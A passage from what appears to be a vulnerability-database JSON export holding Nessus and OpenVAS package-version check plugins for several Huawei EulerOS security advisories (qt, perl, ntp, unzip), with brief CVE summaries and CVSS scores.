script_family(english:\"Huawei Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2020 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/EulerOS/release\", \"Host/EulerOS/rpm-list\", \"Host/EulerOS/sp\");\n script_exclude_keys(\"Host/EulerOS/uvp_version\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nrelease = get_kb_item(\"Host/EulerOS/release\");\nif (isnull(release) || release !~ \"^EulerOS\") audit(AUDIT_OS_NOT, \"EulerOS\");\nif (release !~ \"^EulerOS release 2\\.0(\\D|$)\") audit(AUDIT_OS_NOT, \"EulerOS 2.0\");\n\nsp = get_kb_item(\"Host/EulerOS/sp\");\nif (isnull(sp) || sp !~ \"^(8)$\") audit(AUDIT_OS_NOT, \"EulerOS 2.0 SP8\");\n\nuvp = get_kb_item(\"Host/EulerOS/uvp_version\");\nif (!empty_or_null(uvp)) audit(AUDIT_OS_NOT, \"EulerOS 2.0 SP8\", \"EulerOS UVP \" + uvp);\n\nif (!get_kb_item(\"Host/EulerOS/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"EulerOS\", cpu);\n\nflag = 0;\n\npkgs = [\"qt-4.8.7-42.h6.eulerosv2r8\",\n \"qt-common-4.8.7-42.h6.eulerosv2r8\",\n \"qt-devel-4.8.7-42.h6.eulerosv2r8\",\n \"qt-mysql-4.8.7-42.h6.eulerosv2r8\",\n \"qt-odbc-4.8.7-42.h6.eulerosv2r8\",\n \"qt-x11-4.8.7-42.h6.eulerosv2r8\"];\n\nforeach (pkg in pkgs)\n if (rpm_check(release:\"EulerOS-2.0\", sp:\"8\", reference:pkg)) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"qt\");\n}\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2020-03-26T06:41:12", "bulletinFamily": "scanner", "description": "According to the version of the perl packages installed, the EulerOS\ninstallation on the remote host is affected by the following\nvulnerability :\n\n - The Dumper method in Data::Dumper before 2.154, as used\n in Perl 5.20.1 and earlier, allows context-dependent\n attackers to cause a denial of service (stack\n consumption and crash) via an Array-Reference with many\n nested Array-References, which triggers a large number\n of recursive calls to the DD_dump\n function.(CVE-2014-4330)\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the EulerOS security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "modified": "2020-03-23T00:00:00", "id": "EULEROS_SA-2020-1318.NASL", "href": "https://www.tenable.com/plugins/nessus/134809", "published": "2020-03-23T00:00:00", "title": "EulerOS 2.0 SP5 : perl (EulerOS-SA-2020-1318)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(134809);\n script_version(\"1.2\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2020/03/25\");\n\n script_cve_id(\n \"CVE-2014-4330\"\n );\n script_bugtraq_id(\n 70142\n );\n\n script_name(english:\"EulerOS 2.0 SP5 : perl (EulerOS-SA-2020-1318)\");\n script_summary(english:\"Checks the rpm output for the updated package.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote EulerOS host is missing a security update.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to the version of the perl packages installed, the EulerOS\ninstallation on the remote host is affected by the following\nvulnerability :\n\n - The Dumper method in Data::Dumper before 2.154, as used\n in Perl 5.20.1 and earlier, allows context-dependent\n attackers to cause a denial of service (stack\n consumption and crash) via an Array-Reference with many\n nested Array-References, which triggers a large number\n of recursive calls to the DD_dump\n function.(CVE-2014-4330)\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the EulerOS security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\");\n # https://developer.huaweicloud.com/ict/en/site-euleros/euleros/security-advisories/EulerOS-SA-2020-1318\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?46877f7c\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected perl package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:N/I:N/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/03/23\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/03/23\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:perl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:perl-core\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:perl-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:perl-libs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:perl-macros\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:huawei:euleros:2.0\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Huawei Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2020 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/EulerOS/release\", \"Host/EulerOS/rpm-list\", \"Host/EulerOS/sp\");\n script_exclude_keys(\"Host/EulerOS/uvp_version\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nrelease = get_kb_item(\"Host/EulerOS/release\");\nif (isnull(release) || release !~ \"^EulerOS\") audit(AUDIT_OS_NOT, \"EulerOS\");\nif (release !~ \"^EulerOS release 2\\.0(\\D|$)\") audit(AUDIT_OS_NOT, \"EulerOS 2.0\");\n\nsp = get_kb_item(\"Host/EulerOS/sp\");\nif (isnull(sp) || sp !~ \"^(5)$\") audit(AUDIT_OS_NOT, \"EulerOS 2.0 SP5\");\n\nuvp = get_kb_item(\"Host/EulerOS/uvp_version\");\nif (!empty_or_null(uvp)) audit(AUDIT_OS_NOT, \"EulerOS 2.0 SP5\", \"EulerOS UVP \" + uvp);\n\nif (!get_kb_item(\"Host/EulerOS/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"EulerOS\", cpu);\n\nflag = 0;\n\npkgs = [\"perl-5.16.3-292.h12.eulerosv2r7\",\n \"perl-core-5.16.3-292.h12.eulerosv2r7\",\n \"perl-devel-5.16.3-292.h12.eulerosv2r7\",\n \"perl-libs-5.16.3-292.h12.eulerosv2r7\",\n \"perl-macros-5.16.3-292.h12.eulerosv2r7\"];\n\nforeach (pkg in pkgs)\n if (rpm_check(release:\"EulerOS-2.0\", sp:\"5\", reference:pkg)) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_NOTE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"perl\");\n}\n", "cvss": {"score": 2.1, "vector": "AV:L/AC:L/Au:N/C:N/I:N/A:P"}}], "wpvulndb": [{"lastseen": "2020-03-26T06:23:51", "bulletinFamily": "software", "description": "WordPress Vulnerability - Multiple plugins - Unauthenticated Dompdf Local File Inclusion (LFI) The PoC will be displayed on April 07, 2020, to give users the time to update. \n", "modified": "2020-03-26T00:00:00", "published": "2020-03-25T00:00:00", "id": "WPVDB-ID:10149", "href": "https://wpvulndb.com/vulnerabilities/10149", "type": "wpvulndb", "title": "Multiple plugins - Unauthenticated Dompdf Local File Inclusion (LFI)", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:N"}}], "openvas": [{"lastseen": "2020-03-24T16:57:39", "bulletinFamily": "scanner", "description": "The remote host is missing an update for the Huawei EulerOS\n ", "modified": "2020-03-24T00:00:00", "published": "2020-03-24T00:00:00", "id": "OPENVAS:1361412562311220201314", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562311220201314", "title": "Huawei EulerOS: Security Advisory for ntp (EulerOS-SA-2020-1314)", "type": "openvas", "sourceData": "# Copyright (C) 2020 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) the respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.1.2.2020.1314\");\n script_version(\"2020-03-24T07:31:07+0000\");\n script_cve_id(\"CVE-2013-5211\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n script_tag(name:\"last_modification\", value:\"2020-03-24 07:31:07 +0000 (Tue, 24 Mar 2020)\");\n script_tag(name:\"creation_date\", value:\"2020-03-24 07:31:07 +0000 (Tue, 24 Mar 2020)\");\n script_name(\"Huawei EulerOS: Security Advisory for ntp (EulerOS-SA-2020-1314)\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2020 Greenbone Networks GmbH\");\n script_family(\"Huawei EulerOS Local Security Checks\");\n script_dependencies(\"gb_huawei_euleros_consolidation.nasl\");\n script_mandatory_keys(\"ssh/login/euleros\", \"ssh/login/rpms\", re:\"ssh/login/release=EULEROS-2\\.0SP5\");\n\n script_xref(name:\"EulerOS-SA\", value:\"2020-1314\");\n script_xref(name:\"URL\", value:\"https://developer.huaweicloud.com/ict/en/site-euleros/euleros/security-advisories/EulerOS-SA-2020-1314\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the Huawei EulerOS\n 'ntp' package(s) announced via the EulerOS-SA-2020-1314 advisory.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable package version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"The monlist feature in ntp_request.c in ntpd in NTP before 4.2.7p26 allows remote attackers to cause a denial of service (traffic amplification) via forged (1) REQ_MON_GETLIST or (2) REQ_MON_GETLIST_1 requests, as exploited in the wild in December 2013.(CVE-2013-5211)\");\n\n script_tag(name:\"affected\", value:\"'ntp' package(s) on Huawei EulerOS V2.0SP5.\");\n\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\nreport = \"\";\n\nif(release == \"EULEROS-2.0SP5\") {\n\n if(!isnull(res = isrpmvuln(pkg:\"ntp\", rpm:\"ntp~4.2.6p5~28.h13.eulerosv2r7\", rls:\"EULEROS-2.0SP5\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"ntpdate\", rpm:\"ntpdate~4.2.6p5~28.h13.eulerosv2r7\", rls:\"EULEROS-2.0SP5\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"sntp\", rpm:\"sntp~4.2.6p5~28.h13.eulerosv2r7\", rls:\"EULEROS-2.0SP5\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if (__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nexit(0);", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2020-03-24T16:54:00", "bulletinFamily": "scanner", "description": "The remote host is missing an update for the Huawei EulerOS\n ", "modified": "2020-03-24T00:00:00", "published": "2020-03-24T00:00:00", "id": "OPENVAS:1361412562311220201318", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562311220201318", "title": "Huawei EulerOS: Security Advisory for perl (EulerOS-SA-2020-1318)", "type": "openvas", "sourceData": "# Copyright (C) 2020 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) the respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.1.2.2020.1318\");\n script_version(\"2020-03-24T07:31:27+0000\");\n script_cve_id(\"CVE-2014-4330\");\n script_tag(name:\"cvss_base\", value:\"2.1\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:N/I:N/A:P\");\n script_tag(name:\"last_modification\", value:\"2020-03-24 07:31:27 +0000 (Tue, 24 Mar 2020)\");\n script_tag(name:\"creation_date\", value:\"2020-03-24 07:31:27 +0000 (Tue, 24 Mar 2020)\");\n script_name(\"Huawei EulerOS: Security Advisory for perl (EulerOS-SA-2020-1318)\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2020 Greenbone Networks GmbH\");\n script_family(\"Huawei EulerOS Local Security Checks\");\n script_dependencies(\"gb_huawei_euleros_consolidation.nasl\");\n script_mandatory_keys(\"ssh/login/euleros\", \"ssh/login/rpms\", re:\"ssh/login/release=EULEROS-2\\.0SP5\");\n\n script_xref(name:\"EulerOS-SA\", value:\"2020-1318\");\n script_xref(name:\"URL\", value:\"https://developer.huaweicloud.com/ict/en/site-euleros/euleros/security-advisories/EulerOS-SA-2020-1318\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the Huawei EulerOS\n 'perl' package(s) announced via the EulerOS-SA-2020-1318 advisory.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable package version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"The Dumper method in Data::Dumper before 2.154, as used in Perl 5.20.1 and earlier, allows context-dependent attackers to cause a denial of service (stack consumption and crash) via an Array-Reference with many nested Array-References, which triggers a large number of recursive calls to the DD_dump function.(CVE-2014-4330)\");\n\n script_tag(name:\"affected\", value:\"'perl' package(s) on Huawei EulerOS V2.0SP5.\");\n\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\nreport = \"\";\n\nif(release == \"EULEROS-2.0SP5\") {\n\n if(!isnull(res = isrpmvuln(pkg:\"perl\", rpm:\"perl~5.16.3~292.h12.eulerosv2r7\", rls:\"EULEROS-2.0SP5\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"perl-core\", rpm:\"perl-core~5.16.3~292.h12.eulerosv2r7\", rls:\"EULEROS-2.0SP5\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"perl-devel\", rpm:\"perl-devel~5.16.3~292.h12.eulerosv2r7\", rls:\"EULEROS-2.0SP5\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"perl-libs\", rpm:\"perl-libs~5.16.3~292.h12.eulerosv2r7\", rls:\"EULEROS-2.0SP5\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"perl-macros\", rpm:\"perl-macros~5.16.3~292.h12.eulerosv2r7\", rls:\"EULEROS-2.0SP5\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if (__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nexit(0);", "cvss": {"score": 2.1, "vector": "AV:L/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2020-03-24T16:50:43", "bulletinFamily": "scanner", "description": "The remote host is missing an update for the Huawei EulerOS\n ", "modified": "2020-03-24T00:00:00", "published": "2020-03-24T00:00:00", "id": "OPENVAS:1361412562311220201323", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562311220201323", "title": "Huawei EulerOS: Security Advisory for qt (EulerOS-SA-2020-1323)", "type": "openvas", "sourceData": "# Copyright (C) 2020 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) the respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.1.2.2020.1323\");\n script_version(\"2020-03-24T07:32:07+0000\");\n script_cve_id(\"CVE-2015-9541\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n script_tag(name:\"last_modification\", value:\"2020-03-24 07:32:07 +0000 (Tue, 24 Mar 2020)\");\n script_tag(name:\"creation_date\", value:\"2020-03-24 07:32:07 +0000 (Tue, 24 Mar 2020)\");\n script_name(\"Huawei EulerOS: Security Advisory for qt (EulerOS-SA-2020-1323)\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2020 Greenbone Networks GmbH\");\n script_family(\"Huawei EulerOS Local Security Checks\");\n script_dependencies(\"gb_huawei_euleros_consolidation.nasl\");\n script_mandatory_keys(\"ssh/login/euleros\", \"ssh/login/rpms\", re:\"ssh/login/release=EULEROS-2\\.0SP5\");\n\n script_xref(name:\"EulerOS-SA\", value:\"2020-1323\");\n script_xref(name:\"URL\", value:\"https://developer.huaweicloud.com/ict/en/site-euleros/euleros/security-advisories/EulerOS-SA-2020-1323\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the Huawei EulerOS\n 'qt' package(s) announced via the EulerOS-SA-2020-1323 advisory.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable package version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Qt through 5.14 allows an exponential XML entity expansion attack via a crafted SVG document that is mishandled in QXmlStreamReader, a related issue to CVE-2003-1564.(CVE-2015-9541)\");\n\n script_tag(name:\"affected\", value:\"'qt' package(s) on Huawei EulerOS V2.0SP5.\");\n\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\nreport = \"\";\n\nif(release == \"EULEROS-2.0SP5\") {\n\n if(!isnull(res = isrpmvuln(pkg:\"qt\", rpm:\"qt~4.8.7~2.h6.eulerosv2r7\", rls:\"EULEROS-2.0SP5\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"qt-devel\", rpm:\"qt-devel~4.8.7~2.h6.eulerosv2r7\", rls:\"EULEROS-2.0SP5\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"qt-mysql\", rpm:\"qt-mysql~4.8.7~2.h6.eulerosv2r7\", rls:\"EULEROS-2.0SP5\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"qt-odbc\", rpm:\"qt-odbc~4.8.7~2.h6.eulerosv2r7\", rls:\"EULEROS-2.0SP5\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"qt-postgresql\", rpm:\"qt-postgresql~4.8.7~2.h6.eulerosv2r7\", rls:\"EULEROS-2.0SP5\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"qt-x11\", rpm:\"qt-x11~4.8.7~2.h6.eulerosv2r7\", rls:\"EULEROS-2.0SP5\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if (__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nexit(0);", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-03-24T16:51:54", "bulletinFamily": "scanner", "description": "The remote host is missing an update for the Huawei EulerOS\n ", "modified": "2020-03-23T00:00:00", "published": "2020-03-23T00:00:00", "id": "OPENVAS:1361412562311220201299", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562311220201299", "title": "Huawei EulerOS: Security Advisory for qt (EulerOS-SA-2020-1299)", "type": "openvas", "sourceData": "# Copyright (C) 2020 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) the respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.1.2.2020.1299\");\n script_version(\"2020-03-23T07:40:16+0000\");\n script_cve_id(\"CVE-2015-9541\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n script_tag(name:\"last_modification\", value:\"2020-03-23 07:40:16 +0000 (Mon, 23 Mar 2020)\");\n script_tag(name:\"creation_date\", value:\"2020-03-23 07:40:16 +0000 (Mon, 23 Mar 2020)\");\n script_name(\"Huawei EulerOS: Security Advisory for qt (EulerOS-SA-2020-1299)\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2020 Greenbone Networks GmbH\");\n script_family(\"Huawei EulerOS Local Security Checks\");\n script_dependencies(\"gb_huawei_euleros_consolidation.nasl\");\n script_mandatory_keys(\"ssh/login/euleros\", \"ssh/login/rpms\", re:\"ssh/login/release=EULEROS-2\\.0SP8\");\n\n script_xref(name:\"EulerOS-SA\", value:\"2020-1299\");\n script_xref(name:\"URL\", value:\"https://developer.huaweicloud.com/ict/en/site-euleros/euleros/security-advisories/EulerOS-SA-2020-1299\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the Huawei EulerOS\n 'qt' package(s) announced via the EulerOS-SA-2020-1299 advisory.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable package version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Qt through 5.14 allows an exponential XML entity expansion attack via a crafted SVG document that is mishandled in QXmlStreamReader, a related issue to CVE-2003-1564.(CVE-2015-9541)\");\n\n script_tag(name:\"affected\", value:\"'qt' package(s) on Huawei EulerOS V2.0SP8.\");\n\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\nreport = \"\";\n\nif(release == \"EULEROS-2.0SP8\") {\n\n if(!isnull(res = isrpmvuln(pkg:\"qt\", rpm:\"qt~4.8.7~42.h6.eulerosv2r8\", rls:\"EULEROS-2.0SP8\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"qt-common\", rpm:\"qt-common~4.8.7~42.h6.eulerosv2r8\", rls:\"EULEROS-2.0SP8\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"qt-devel\", rpm:\"qt-devel~4.8.7~42.h6.eulerosv2r8\", rls:\"EULEROS-2.0SP8\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"qt-mysql\", rpm:\"qt-mysql~4.8.7~42.h6.eulerosv2r8\", rls:\"EULEROS-2.0SP8\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"qt-odbc\", rpm:\"qt-odbc~4.8.7~42.h6.eulerosv2r8\", rls:\"EULEROS-2.0SP8\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"qt-x11\", rpm:\"qt-x11~4.8.7~42.h6.eulerosv2r8\", rls:\"EULEROS-2.0SP8\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if (__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nexit(0);", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-03-14T16:51:21", "bulletinFamily": "scanner", "description": "The remote host is missing an update for the Huawei EulerOS\n ", "modified": "2020-03-13T00:00:00", "published": "2020-03-13T00:00:00", "id": "OPENVAS:1361412562311220201222", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562311220201222", "title": "Huawei EulerOS: Security Advisory for unzip (EulerOS-SA-2020-1222)", "type": "openvas", "sourceData": "# Copyright (C) 2020 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) the respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.1.2.2020.1222\");\n script_version(\"2020-03-13T07:15:38+0000\");\n script_cve_id(\"CVE-2015-7696\", \"CVE-2015-7697\");\n script_tag(name:\"cvss_base\", value:\"6.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"last_modification\", value:\"2020-03-13 07:15:38 +0000 (Fri, 13 Mar 2020)\");\n script_tag(name:\"creation_date\", value:\"2020-03-13 07:15:38 +0000 (Fri, 13 Mar 2020)\");\n script_name(\"Huawei EulerOS: Security Advisory for unzip (EulerOS-SA-2020-1222)\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2020 Greenbone Networks GmbH\");\n script_family(\"Huawei EulerOS Local Security Checks\");\n script_dependencies(\"gb_huawei_euleros_consolidation.nasl\");\n script_mandatory_keys(\"ssh/login/euleros\", \"ssh/login/rpms\", 